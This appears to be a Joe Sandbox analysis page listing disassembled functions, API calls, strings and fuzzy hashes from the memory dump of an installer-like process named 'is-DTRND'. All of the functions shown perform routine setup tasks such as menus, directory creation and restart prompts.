Instruction ID: 62ebb0c2f71abb8bc92ace695c7d2b4d00ef98af284bd370ad9ae17fcec81740
Opcode Fuzzy Hash: fba564e9f5f9f210018b68d7ed56646b15d5308277a25301db98864e6a1c2157
Instruction Fuzzy Hash: DEE02BB0F826346AD22037697C4AF9B2718CB14321F50493BB005751D2D6BC0880CF6C

Uniqueness

Uniqueness Score: -1.00%

Function 00476940 Relevance: 7.6, APIs: 5, Instructions: 102windowCOMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32 ref: 004769AE
GetSystemMetrics.USER32 ref: 004769B6
GetSystemMenu.USER32(00000000,00000000,00000000,00476A77), ref: 00476A0F
AppendMenuA.USER32 ref: 00476A20
AppendMenuA.USER32 ref: 00476A38

Memory Dump Source

Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd

Similarity

API ID: MenuSystem$AppendMetrics
String ID:
API String ID: 4092608398-0
Opcode ID: 0a58bcd2f7566254b3e1c0a11509b3060d16c145df205e1e68c56360b64492b4
Instruction ID: 95fc3f10e04f950199989cf52bad7493749d61a9b456fc21dcab856dcf260ed5
Opcode Fuzzy Hash: 0a58bcd2f7566254b3e1c0a11509b3060d16c145df205e1e68c56360b64492b4
Instruction Fuzzy Hash: 0C3125B17047146BD710EF368C82B9A3B969B02318F41847EF944AB3E3CA7D9C08875D

Uniqueness

Uniqueness Score: -1.00%

Function 0045392B Relevance: 7.5, APIs: 5, Instructions: 45COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(?), ref: 0045392F
WaitForInputIdle.USER32 ref: 00453940
MsgWaitForMultipleObjects.USER32 ref: 00453963
GetExitCodeProcess.KERNEL32 ref: 00453973
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?), ref: 0045397C

Memory Dump Source

Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd

Similarity

API ID: CloseHandleWait$CodeExitIdleInputMultipleObjectsProcess
String ID:
API String ID: 2750287839-0
Opcode ID: 5917eda15862926d7c0e30986b5aa3e6850667ac7e6dbbe4fcda712edbe667af
Instruction ID: 1fb8955f118ef69bc210d6eece1c5cf55282b31e3a6318546598b334ca376582
Opcode Fuzzy Hash: 5917eda15862926d7c0e30986b5aa3e6850667ac7e6dbbe4fcda712edbe667af
Instruction Fuzzy Hash: B40171B1504709BADF10EFE9CC45BDE77ACAF05325F10412BB914AB1D2CA7C9A44CB58

Uniqueness

Uniqueness Score: -1.00%

Function 00477A74 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 210COMMON

Download Yara Rule

APIs

SetActiveWindow.USER32(?,?,00000000,00477D73,?,?,00000001,?), ref: 00477B83
SHChangeNotify.SHELL32(08000000,00000000,00000000,00000000), ref: 00477BE9

Strings

Need to restart Windows? %s, xrefs: 00477C26
, xrefs: 00477CAA

Memory Dump Source

Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd

Similarity

API ID: ActiveChangeNotifyWindow
String ID: $Need to restart Windows? %s
API String ID: 1160245247-4200181552
Opcode ID: 219883ad965e97e5bf244b95060c0e4a642d34d1cef0d483a05b57c28bcc9892
Instruction ID: d3f02237412e89892c7930d271b9ef2760b6198a5a67d929d28789f2d65efbe3
Opcode Fuzzy Hash: 219883ad965e97e5bf244b95060c0e4a642d34d1cef0d483a05b57c28bcc9892
Instruction Fuzzy Hash: 7981A6306042449FDB14EF69D881B9E77F4EF46308F5084BBE8149B362D778A905CB5E

Uniqueness

Uniqueness Score: -1.00%

Function 004682DC Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 161COMMON

Download Yara Rule

APIs

Part of subcall function 0042C81C: GetFullPathNameA.KERNEL32(00000000,00001000,?), ref: 0042C840

Part of subcall function 0042CBC4: CharPrevA.USER32(00000000,00000000,?,?,?,00000000,0042CD0A,00000000,0042CD30,?,?,?,00000000,00000000,?,0042CD45), ref: 0042CBEC

GetLastError.KERNEL32(00000000,004684D9,?,?,00000001,004AE064), ref: 004683B6
SHChangeNotify.SHELL32(00000008,00000001,00000000,00000000), ref: 00468430
SHChangeNotify.SHELL32(00001000,00001001,00000000,00000000), ref: 00468455

Strings

Creating directory: %s, xrefs: 0046839E

Memory Dump Source

Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd

Similarity

API ID: ChangeNotify$CharErrorFullLastNamePathPrev
String ID: Creating directory: %s
API String ID: 2168629741-483064649
Opcode ID: f1cb742da8d3e2a930c6db133d36d8361f831a3e880e7da6ba55a63c83772f20
Instruction ID: 7d789868f9cce9af9f7365a105495f9b42d68ffbac0df78c77a177914cd324d8
Opcode Fuzzy Hash: f1cb742da8d3e2a930c6db133d36d8361f831a3e880e7da6ba55a63c83772f20
Instruction Fuzzy Hash: 89513634E00249ABDB00DFA5C982BDEB7F5AF48304F50856EE850B7391EB795E04CB59

Uniqueness

Uniqueness Score: -1.00%

Function 004535A0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 102COMMON

Download Yara Rule

APIs

6CAD5550.KERNEL32(00000000,SfcIsFileProtected,00000000,00453714), ref: 0045364E
MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000FFF,00000000,00453714), ref: 004536B8

Strings

SfcIsFileProtected, xrefs: 00453648
sfc.dll, xrefs: 00453610

Memory Dump Source

Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd

Similarity

API ID: ByteCharD5550MultiWide
String ID: SfcIsFileProtected$sfc.dll
API String ID: 2811115374-591603554
Opcode ID: 10261435de4ae9b06394bc9a324ab7858c06d9ac19c4e1deedf2d297263d8c0c
Instruction ID: 1080a8b8f05c2285e4028fb1a0b0b0b0736e4f1e3e2d6b590f5a5cfcaecd4d0c
Opcode Fuzzy Hash: 10261435de4ae9b06394bc9a324ab7858c06d9ac19c4e1deedf2d297263d8c0c
Instruction Fuzzy Hash: 04419670A00218ABE720EF55CC85B9E77B8EB44346F5045BBE908A7392D7789F48DA18

Uniqueness

Uniqueness Score: -1.00%

Function 004541B4 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 41registryCOMMON

Download Yara Rule

APIs

Part of subcall function 0042DCB4: 6CAD6790.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,004783BF,?,00000001,?,?,004783BF,?,00000001,00000000), ref: 0042DCD0

RegCloseKey.ADVAPI32(?,0045421F,?,00000001,00000000), ref: 00454212

Strings

PendingFileRenameOperations2, xrefs: 004541F3
PendingFileRenameOperations, xrefs: 004541E4
SYSTEM\CurrentControlSet\Control\Session Manager, xrefs: 004541C0

Memory Dump Source

Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd

Similarity

API ID: CloseD6790
String ID: PendingFileRenameOperations$PendingFileRenameOperations2$SYSTEM\CurrentControlSet\Control\Session Manager
API String ID: 3513276378-2115312317
Opcode ID: 7952b933e601e31c3134de1c1834e2b8603df5e294ab7a413bef5ef84e27e09b
Instruction ID: c798bacfa756c0e5034ad30e8c50e244f89f96b57903828c66e2d8538055c7c3
Opcode Fuzzy Hash: 7952b933e601e31c3134de1c1834e2b8603df5e294ab7a413bef5ef84e27e09b
Instruction Fuzzy Hash: B6F0F6322482086FDB04D6E2DC03E1A73DCC7C4759FB184A7F9009FA82DA78AE54921C

Uniqueness

Uniqueness Score: -1.00%

Function 0046A478 Relevance: 6.3, APIs: 4, Instructions: 263fileCOMMON

Download Yara Rule

APIs

FindNextFileA.KERNEL32(000000FF,?,00000000,0046A649,?,00000000,?,00000001,00000000,0046A817,?,00000000,?,00000000,?,0046A9D2), ref: 0046A625
FindClose.KERNEL32(000000FF,0046A650,0046A649,?,00000000,?,00000001,00000000,0046A817,?,00000000,?,00000000,?,0046A9D2,?), ref: 0046A643
FindNextFileA.KERNEL32(000000FF,?,00000000,0046A76B,?,00000000,?,00000001,00000000,0046A817,?,00000000,?,00000000,?,0046A9D2), ref: 0046A747
FindClose.KERNEL32(000000FF,0046A772,0046A76B,?,00000000,?,00000001,00000000,0046A817,?,00000000,?,00000000,?,0046A9D2,?), ref: 0046A765

Memory Dump Source

Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd

Similarity

API ID: Find$CloseFileNext
String ID:
API String ID: 2066263336-0
Opcode ID: 642c4e1e54191ea309fcd4058225aab2fa0062ac43964b02fb0fa2f81c6087ad
Instruction ID: 9e3b6bbb7669584a5b08e44b159600427b84327eb66dec1ab996ae4c3905ae8d
Opcode Fuzzy Hash: 642c4e1e54191ea309fcd4058225aab2fa0062ac43964b02fb0fa2f81c6087ad
Instruction Fuzzy Hash: 71B13C7490424DAFCF11DFA9C841ADEBBB8BF49304F5081AAE848B3291D7389E55CF55

Uniqueness

Uniqueness Score: -1.00%

Function 0042133C Relevance: 6.1, APIs: 4, Instructions: 127windowCOMMON

Download Yara Rule

APIs

GetMenu.USER32(00000000), ref: 00421429
SetMenu.USER32(00000000,00000000), ref: 00421446
SetMenu.USER32(00000000,00000000), ref: 0042147B
SetMenu.USER32(00000000,00000000), ref: 00421497

Memory Dump Source

Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd

Similarity

API ID: Menu
String ID:
API String ID: 3711407533-0
Opcode ID: b740002c252b0eaa61b67f3d7df36a4faddbe39b5bd2e3a745d4ad23bf4fc522
Instruction ID: ed2eec1c9df0a1c35cc319bbddc0436bf923f05cb9cc28f34756a25b8f072dfe
Opcode Fuzzy Hash: b740002c252b0eaa61b67f3d7df36a4faddbe39b5bd2e3a745d4ad23bf4fc522
Instruction Fuzzy Hash: 8741A1307002645BDB20FB3AA8857AA66964F61308F4906BFFC499F3A7CA7DCC45835D

Uniqueness

Uniqueness Score: -1.00%

Function 004510A4 Relevance: 6.1, APIs: 4, Instructions: 107COMMON

Download Yara Rule

APIs

739214E0.VERSION(00000000,?,?,?,0048A535), ref: 004510C4
739214C0.VERSION(00000000,?,00000000,?,00000000,0045113F,?,00000000,?,?,?,0048A535), ref: 004510F1
73921500.VERSION(?,004511C4,?,?,00000000,?,00000000,?,00000000,0045113F,?,00000000,?,?,?,0048A535), ref: 0045110B
73921500.VERSION(00000000,004511C4,?,?,00000000,004511B2,?,00000000,?,?,?,0048A535), ref: 0045117E

Memory Dump Source

Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd

Similarity

API ID: 73921473921500
String ID:
API String ID: 3586553354-0
Opcode ID: 69b6c89ab7e58b08d2ef8c32711442488174024db6fa8cbe7fb001bea91ad0d4
Instruction ID: c8f8831e43f873d46ab33d5beb91d9861939245644d7e1d35c8cdbeedf39938d
Opcode Fuzzy Hash: 69b6c89ab7e58b08d2ef8c32711442488174024db6fa8cbe7fb001bea91ad0d4
Instruction Fuzzy Hash: BA318D71A04609AFDB01DAA9CC41EBFB7ECEB4D304F5504BAED00E3292D6799D09C769

Uniqueness

Uniqueness Score: -1.00%

Function 0044B0B8 Relevance: 6.1, APIs: 4, Instructions: 98COMMON

Download Yara Rule

APIs

72E5AC50.USER32(00000000,?,00000000,00000000,0044B1FB,?,?,?,?), ref: 0044B14F
SelectObject.GDI32(?,00000000), ref: 0044B175
DrawTextA.USER32(?,00000000,00000000,?,00000000), ref: 0044B1A2
72E5B380.USER32(00000000,?,0044B1C7,0044B1C0,?,00000000,?,00000000,00000000,0044B1FB,?,?,?,?), ref: 0044B1BA

Memory Dump Source

Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd

Similarity

API ID: B380DrawObjectSelectText
String ID:
API String ID: 1652335368-0
Opcode ID: bc4c7d88200d52cf54ed5a5e5976a6b8a21a2d9495f428531505900e307e05ca
Instruction ID: bf10fe6f08034a2c68b865162127de74a15735e291b7bdd25d7118bf05ecb826
Opcode Fuzzy Hash: bc4c7d88200d52cf54ed5a5e5976a6b8a21a2d9495f428531505900e307e05ca
Instruction Fuzzy Hash: 2A317070A04248BFEB11DFA5C856F9EBBF9EB49304F5140A6F404E7291D7389E40CB58

Uniqueness

Uniqueness Score: -1.00%

Function 00416C0A Relevance: 6.1, APIs: 4, Instructions: 67windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(?,?,?,?), ref: 00416C4C
SetTextColor.GDI32(?,00000000), ref: 00416C66
SetBkColor.GDI32(?,00000000), ref: 00416C80
CallWindowProcA.USER32 ref: 00416CA8

Memory Dump Source

Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd

Similarity

API ID: Color$CallMessageProcSendTextWindow
String ID:
API String ID: 601730667-0
Opcode ID: d2ffe42f13c1091e28b7b9725e3c877c548081e4286fc0418fecb33e28b2a67f
Instruction ID: 269df164a710b99dec436246b5747d638c90ae1c4ded9ebfccc10c4a0f795a7e
Opcode Fuzzy Hash: d2ffe42f13c1091e28b7b9725e3c877c548081e4286fc0418fecb33e28b2a67f
Instruction Fuzzy Hash: 101151B1600600AFC710EF6ECD80E9773EDEF48314715882AB59ACB701D638EC418BAD

Uniqueness

Uniqueness Score: -1.00%

Function 00423190 Relevance: 6.1, APIs: 4, Instructions: 54COMMON

Download Yara Rule

APIs

72E5AC50.USER32(00000000,?,?,00000000,?,0041909B,00000000,?,?,00000001,00000000), ref: 004231E6
EnumFontsA.GDI32(00000000,00000000,00423130,00410718,00000000,?,?,00000000,?,0041909B,00000000,?,?,00000001,00000000), ref: 004231F9
72E5AD70.GDI32(00000000,0000005A,00000000,00000000,00423130,00410718,00000000,?,?,00000000,?,0041909B,00000000,?,?,00000001), ref: 00423201
72E5B380.USER32(00000000,00000000,00000000,0000005A,00000000,00000000,00423130,00410718,00000000,?,?,00000000,?,0041909B,00000000), ref: 0042320C

Memory Dump Source

Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd

Similarity

API ID: B380EnumFonts
String ID:
API String ID: 1693878748-0
Opcode ID: 03e727ae4ca16b473abeaf2b1cfb166d6fa29172ef8634f232deafc1f7f05573
Instruction ID: c5365d0d9a92aae00af3c8bde8748560cc1d8ccf97e4765f8d554caa7d1de9f2
Opcode Fuzzy Hash: 03e727ae4ca16b473abeaf2b1cfb166d6fa29172ef8634f232deafc1f7f05573
Instruction Fuzzy Hash: 4A01D2B17482106AE300BFBA5C86B9D3A94DF16319F00427BFD08BF2C2D67E8904476E

Uniqueness

Uniqueness Score: -1.00%

Function 004019D4 Relevance: 6.0, APIs: 4, Instructions: 48memoryCOMMON

Download Yara Rule

APIs

RtlInitializeCriticalSection.KERNEL32(0048D420,00000000,00401A8A,?,?,00402236,0048D460,00000000,00000000,?,?,00401C51,00401C66,00401DAA), ref: 004019EA
RtlEnterCriticalSection.KERNEL32(0048D420,0048D420,00000000,00401A8A,?,?,00402236,0048D460,00000000,00000000,?,?,00401C51,00401C66,00401DAA), ref: 004019FD
LocalAlloc.KERNEL32(00000000,00000FF8,0048D420,00000000,00401A8A,?,?,00402236,0048D460,00000000,00000000,?,?,00401C51,00401C66,00401DAA), ref: 00401A27
RtlLeaveCriticalSection.KERNEL32(0048D420,00401A91,00000000,00401A8A,?,?,00402236,0048D460,00000000,00000000,?,?,00401C51,00401C66,00401DAA), ref: 00401A84

Memory Dump Source

Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd

Similarity

API ID: CriticalSection$AllocEnterInitializeLeaveLocal
String ID:
API String ID: 730355536-0
Opcode ID: 7b4d27c78d3ec42cdf42d9613c85a14480417dbf98181b1af69a1b7d87031786
Instruction ID: edc66444bf91dbccd637f871198ccf20bfd66fdd9cc5066f76d2897232331e27
Opcode Fuzzy Hash: 7b4d27c78d3ec42cdf42d9613c85a14480417dbf98181b1af69a1b7d87031786
Instruction Fuzzy Hash: CD018070E463445EF315BB699806B2D3B95D786B08F51887FF440A7AF2C77C68408B2D

Uniqueness

Uniqueness Score: -1.00%

Function 0048B758 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 113COMMON

Download Yara Rule

APIs

Part of subcall function 0040348C: GetModuleHandleA.KERNEL32(00000000,0048B766), ref: 00403493
Part of subcall function 0040348C: GetCommandLineA.KERNEL32(00000000,0048B766), ref: 0040349E

Part of subcall function 00409C40: 6F7ADB20.COMCTL32(0048B775), ref: 00409C40

Part of subcall function 00410A1C: GetCurrentThreadId.KERNEL32 ref: 00410A6A

Part of subcall function 00419108: GetVersion.KERNEL32(0048B789), ref: 00419108

Part of subcall function 004321C0: OleInitialize.OLE32(00000000), ref: 004321CC

Part of subcall function 0044F3E8: GetModuleHandleA.KERNEL32(user32.dll,NotifyWinEvent,0048B7A2), ref: 0044F423
Part of subcall function 0044F3E8: 6CAD5550.KERNEL32(00000000,user32.dll,NotifyWinEvent,0048B7A2), ref: 0044F429

Part of subcall function 00451C94: GetModuleHandleA.KERNEL32(kernel32.dll,Wow64DisableWow64FsRedirection,00000000,00451D2D,?,?,?,?,00000000,?,0048B7AC), ref: 00451CB4
Part of subcall function 00451C94: 6CAD5550.KERNEL32(00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000,00451D2D,?,?,?,?,00000000,?,0048B7AC), ref: 00451CBA
Part of subcall function 00451C94: GetModuleHandleA.KERNEL32(kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000,00451D2D,?,?,?,?,00000000,?,0048B7AC), ref: 00451CCE
Part of subcall function 00451C94: 6CAD5550.KERNEL32(00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000,00451D2D,?,?,?,?,00000000,?,0048B7AC), ref: 00451CD4

Part of subcall function 00466368: RegisterClipboardFormatA.USER32 ref: 0046636D

SetErrorMode.KERNEL32(00000001,00000000,0048B7FE), ref: 0048B7D0

Part of subcall function 0048B568: GetModuleHandleA.KERNEL32(user32.dll,DisableProcessWindowsGhosting,0048B7DA,00000001,00000000,0048B7FE), ref: 0048B572
Part of subcall function 0048B568: 6CAD5550.KERNEL32(00000000,user32.dll,DisableProcessWindowsGhosting,0048B7DA,00000001,00000000,0048B7FE), ref: 0048B578

Part of subcall function 0042459C: SendMessageA.USER32(?,0000B020,00000000,?), ref: 004245BB

Part of subcall function 0042438C: SetWindowTextA.USER32(?,00000000), ref: 004243A4

ShowWindow.USER32(?,00000005,00000000,0048B7FE), ref: 0048B831

Part of subcall function 00477240: SetActiveWindow.USER32(?), ref: 004772DA

Strings

Setup, xrefs: 0048B817

Memory Dump Source

Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd

Similarity

API ID: HandleModule$D5550$Window$ActiveClipboardCommandCurrentErrorFormatInitializeLineMessageModeRegisterSendShowTextThreadVersion
String ID: Setup
API String ID: 1906813367-3839654196
Opcode ID: 73dd2796517a7e24d17ffc93994b351d99c23e78418e73e458febebc51486027
Instruction ID: 64d8c448c096c2f6580127d36ea2c8f862acc3958c68ac9c2a5694fa641c873f
Opcode Fuzzy Hash: 73dd2796517a7e24d17ffc93994b351d99c23e78418e73e458febebc51486027
Instruction Fuzzy Hash: 7C31C4717046049ED211BBB7EC1392D37A8DB89728B52487FF80496AA2DB3C58508B7E

Uniqueness

Uniqueness Score: -1.00%

Function 00452404 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 83COMMON

Download Yara Rule

APIs

CreateDirectoryA.KERNEL32(00000000,00000000,?,00000000,004524F3,?,?,00000000,0048D628,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0045244A
GetLastError.KERNEL32(00000000,00000000,?,00000000,004524F3,?,?,00000000,0048D628,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00452453

Strings

.tmp, xrefs: 00452433

Memory Dump Source

Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd

Similarity

API ID: CreateDirectoryErrorLast
String ID: .tmp
API String ID: 1375471231-2986845003
Opcode ID: 3d8a0fc9d76ea684d9b8ffdb5fa20424f3177d473ad327c50664e8b149708a35
Instruction ID: 262ed652606ecd4b24f84628cd2d186957f5f2011fffa4f2ae7386c47ef5af69
Opcode Fuzzy Hash: 3d8a0fc9d76ea684d9b8ffdb5fa20424f3177d473ad327c50664e8b149708a35
Instruction Fuzzy Hash: A6216775A00308ABDB00EFA5C9829DFB7B9EF45305F50457BF801B7342DA7CAE059A68

Uniqueness

Uniqueness Score: -1.00%

